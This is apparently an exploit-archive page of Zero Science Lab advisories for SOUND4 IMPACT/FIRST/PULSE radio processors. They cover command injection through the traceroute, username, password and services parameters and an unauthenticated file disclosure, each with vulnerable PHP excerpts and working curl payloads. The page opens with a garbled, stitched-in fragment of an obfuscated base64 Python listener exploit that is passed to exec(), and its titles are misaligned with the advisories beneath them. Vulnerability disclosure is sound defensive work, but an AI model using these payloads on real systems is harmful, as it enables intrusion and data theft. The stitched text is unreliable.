"ubGlzdGVuKDEpDQogICAgICAgICAgICA"+        "gICAgY29ubiw"importer += "gYWRkciA9IHMuYWNjZXB0KCkNCiAgIC"+        "AgICAgICAgICA"importer += "gICBwcmludCgiQ29ubmVjdGlvbiBmc"+        "m9tIHt9Ont9Ii5"importer += "mb3JtYXQoYWRkclswXSwgYWRkclsx"+        "XSkpDQogICAgICA"importer += "gICAgICAgICAgdGVsbmV0dXMuc29"+        "jayA9IGNvbm4NCiA"importer += "gICAgICAgICAgIGV4Y2VwdCBzb2"+        "NrZXQudGltZW91dCB"importer += "hcyBwOg0KICAgICAgICAgICAgI"+        "CAgIHByaW50KCJIbW1"importer += "tICh7bXNnfSkiLmZvcm1hdCht"+        "c2c9cCkpDQogICAgICA"importer += "gICAgICAgICAgcy5jbG9zZSg"+        "pDQogICAgICAgICAgICA"importer += "gICAgZXhpdCgwKQ0KICAgIC"+        "AgICAgICAgYnJlYWsNCg0"importer += "KICAgICAgICBwcmludCgiW"+        "W91IGdvdCBzaGVsbC4iKQ0"importer += "KICAgICAgICB0ZWxuZXR1"+        "cy5pbnRlcmFjdCgpDQogICA"importer += "gICAgIGNvbm4uY2xvc2U"+        "oKQ0KDQogICAgZGVmIG1haW4"importer += "oc2VsZik6DQogICAgIC"+        "AgIHNlbGYudGhlX2FyZ3MoKQ0"importer += "KICAgICAgICBzZWxmL"+        "nRoZV9zdWJwKCkNCg0KaWYgX19"importer += "uYW1lX18gPT0gJ19f"+        "bWFpbl9fJzoNCiAgICBWaWRlb0t"importer += "pbGxlZFRoZVJhZGl"+        "vU3RhcigpLm1haW4oKQ0K"######"retropmi  = "U2VjdXJpdHkgaXM"+        "gbGlrZSBhbiBvbmlvbjogdGhlIG1v"retropmi += "cmUgbGF5ZXJzIH"+        "lvdSBwZWVsLCB0aGUgbW9yZSBpdCBz"retropmi += "dGlua3Mu"####"+        "###############################"radio_code = base64.b64decode(importer)curves = [ord(c) for c in retropmi]maxi = max(curves)mini = min(curves)code_range = maxi - minijcoords = [int(20 * (1 - (codeio - mini) / code_range)) for codeio in curves]for y in range(20, 0, -1):    line = ""    for x in range(len(jcoords)):        if jcoords[x] >= y:            line += "-"        else:            line += " "    print(line)    time.sleep(0.03/1.337)exec(radio_code)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x upload.cgi Code Execution

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a conditional command injection vulnerability in traceroute.php.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (traceroute.php) Conditional Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: This vulnerability allows a local authenticated user to create afile in the /tmp directory that contains malicious commands. The filemust have the filename ending with .traceroute.pid, and the commands inthe file can only be executed once by an external unauthenticated attacker.By calling the vulnerable script and making a single HTTP POST request,the attacker can gain command execution on the system. After the requestis made, the file containing the malicious commands will be deleted.-------------------------------------------------------------------------/var/www/traceroute.php:------------------------02:    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['traceroute_host']) && isset($_POST['networkid'])) {03:        $pidfilename="/tmp/" . $_POST['networkid'] . ".traceroute.pid";04:        if( file_exists($pidfilename)) {05:             $procid=file_get_contents($pidfilename);06:             shell_exec("pkill -P ".$procid);07:        }......29:            unlink($pidfilename);30:            exit();-------------------------------------------------------------------------Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5740Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5740.php26.09.2022--#On the server> echo ";id>/var/www/b" > /tmp/251.traceroute.pid#External> curl -XPOST -sk https://RADIO/traceroute.php --data "traceroute_host=t00t&networkid=251"> curl -XPOST -sk https://RADIO/buid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x traceroute.php Conditional Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a username related unauthenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (username) Unauthenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated OS command injectionvulnerability. This can be exploited to inject and execute arbitrary shellcommands through the 'username' HTTP POST parameter through index.php andlogin.php script.========================================================================/var/www/login.php:-------------------09: if (isset($_POST['username']) && isset($_POST['password'])) {10:11:    $ret = -1;12:    // remarque: Check Password for broken, only admin/admin as valid user/password13:    exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5739Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5739.php26.09.2022--> curl --fail -XPOST -sko nul https://RADIOGAGA/index.php --data "username=`id>/var/www/j`&password=ZSL" && curl -sk https://RADIOGAGA/juid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x username Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a password related unauthenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (password) Unauthenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated OS command injectionvulnerability. This can be exploited to inject and execute arbitrary shellcommands through the 'password' HTTP POST parameter through index.php andlogin.php script.========================================================================/var/www/login.php:-------------------09: if (isset($_POST['username']) && isset($_POST['password'])) {10:11:    $ret = -1;12:    // remarque: Check Password for broken, only admin/admin as valid user/password13:    exec('echo ' . $_POST['password'] . ' | /opt/sound4/sound4server _check_pwd_ ' .'"'.$_POST['username'].'";',$out,$ret);========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5738Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5738.php26.09.2022--> curl --fail -XPOST -sko nul https://RADIOGUGU/index.php --data "username=ZSL&password=`id>/var/www/g`" && curl -sk https://RADIOGUGU/guid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x password Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco versions 2.x and below suffer from a services related authenticated command injection vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (services) Authenticated Command InjectionVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: An authenticated command injection vulnerability exists in thewww-data-handler.php script at line 20, where the 'services' HTTP POSTparameter is passed as an argument to the system command "/usr/local/bin/www-data-handler.sh --restartsrv".This allows an attacker to inject arbitrary system commands into the'services' parameter, which are then executed by the script with theprivileges of the 'www-data' user.========================================================================/var/www/www-data-handler.php:------------------------------18: } else if(isset($_POST['services'])&&$_POST['services']!='') {19:     $ret=-1;20:     exec("/usr/local/bin/www-data-handler.sh --restartsrv ".$_POST['services'],$out,$ret);21:     echo $ret;22:     exit;23: }========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5737Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5737.php26.09.2022--> curl --fail -XPOST -sko nul \       'https://RADIOGUGA/www-data-handler.php' \       -H 'Cookie: PHPSESSID=fnlqhsd916g59uob4fgact97bd' \       --data "services=;id>/var/www/m" \       && curl -sk 'https://RADIOGUGA/m'uid=33(www-data) gid=33(www-data) groups=29(audio),33(www-data)

SOUND4 IMPACT/FIRST/PULSE/Eco 2.x services Command Injection

SOUND4 IMPACT/FIRST/PULSE/Eco version 2.x and below suffer from an unauthenticated file disclosure vulnerability.

    SOUND4 IMPACT/FIRST/PULSE/Eco <=2.x (PHPTail) Unauthenticated File DisclosureVendor: SOUND4 Ltd.Product web page: https://www.sound4.com | https://www.sound4.bizAffected version: FM/HD Radio Processing:                  Impact/Pulse/First (Version 2: 1.1/2.15)                  Impact/Pulse/First (Version 1: 2.1/1.69)                  Impact/Pulse Eco 1.16                  Voice Processing:                  BigVoice4 1.2                  BigVoice2 1.30                  Web-Audio Streaming:                  Stream 1.1/2.4.29                  Watermarking:                  WM2 (Kantar Media) 1.11Summary: The SOUND4 IMPACT introduces an innovative process - mono andstereo parts of the signal are processed separately to obtain perfectconsistency in terms of both sound and level. Therefore, in movingreception, when the FM receiver switches from stereo to mono and back tostereo, the sound variations and changes in level are reduced by over 90%.In the SOUND4 IMPACT processing chain, the stereo expander can be usedsubstantially without any limitations.With its advanced functionalities and impressive versatility, SOUND4PULSE gives clients the ultimate price - performance ratio, providingmuch more than just a processor. Flexible and powerful, it ensures perfectsound quality and full compatibility with radio broadcasting standardsand can be used simultaneously for FM and HD, DAB, DRM or streaming.SOUND4 FIRST provides all the most important functionalities you needin an FM/HD processor and sets the bar high both in terms of performanceand affordability. Designed to deliver a sound of uncompromising quality,this tool gives you 2-band processing, a digital stereo generator and anIMPACT Clipper.Desc: The application suffers from an unauthenticated file disclosurevulnerability. Using the 'file' GET parameter attackers can disclosearbitrary files on the affected device and disclose sensitive and systeminformation.========================================================================/usr/cgi-bin/loghandler.php:----------------------------05: require 'phptail.php';06: /**07:  * Initilize a new instance of PHPTail08:  * @var PHPTail09:  */10: if(isset($_GET['file']))  {11:     $file=$_GET['file'];12:     $file_display=$_GET['file_display'];13: } else {14:     $file=getenv("PATH_TRANSLATED");15:     $file_display="SOUND4 Log: " . getenv("PATH_INFO");16: }17: $tail = new PHPTail($file, $file_display);========================================================================/usr/cgi-bin/phptail.php:-------------------------71: $data = array();72: if($maxLength > 0) {73:74:     $fp = fopen($this->log, 'r');75:     fseek($fp, -$maxLength , SEEK_END);76:     $data = explode("\n", fread($fp, $maxLength));77:78: }79: /**80:  * If the last entry in the array is an empty string lets remove it.81:  */82: if(end($data) == "") {83:     array_pop($data);84: }85: return json_encode(array("size" => $fsize, "data" => $data));========================================================================Tested on: Apache/2.4.25 (Unix)           OpenSSL/1.0.2k           PHP/7.1.1           GNU/Linux 5.10.43 (armv7l)           GNU/Linux 4.9.228 (armv7l)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2022-5736Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5736.php26.09.2022--> curl -k "https://RADIOGAGA/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd" | python -m json.tool{    "size": 519,    "data": [        "root:x:0:0:root:/root:/bin/sh",        "daemon:x:1:1:daemon:/usr/sbin:/bin/false",        "bin:x:2:2:bin:/bin:/bin/false",        "sys:x:3:3:sys:/dev:/bin/false",        "sync:x:4:100:sync:/bin:/bin/sync",        "mail:x:8:8:mail:/var/spool/mail:/bin/false",        "www-data:x:33:33:www-data:/var/www:/bin/false",        "operator:x:37:37:Operator:/var:/bin/false",        "nobody:x:99:99:nobody:/home:/bin/false",        "sound4:x:1000:1000::/home/sound4:/bin/sh",        "avahi:x:1001:1001::/:/bin/false",        "dbus:x:1002:1002:DBus messagebus user:/var/run/dbus:/bin/false",        "sshd:x:1003:1004:SSH drop priv user:/:/bin/false"    ]}

Tag

#mac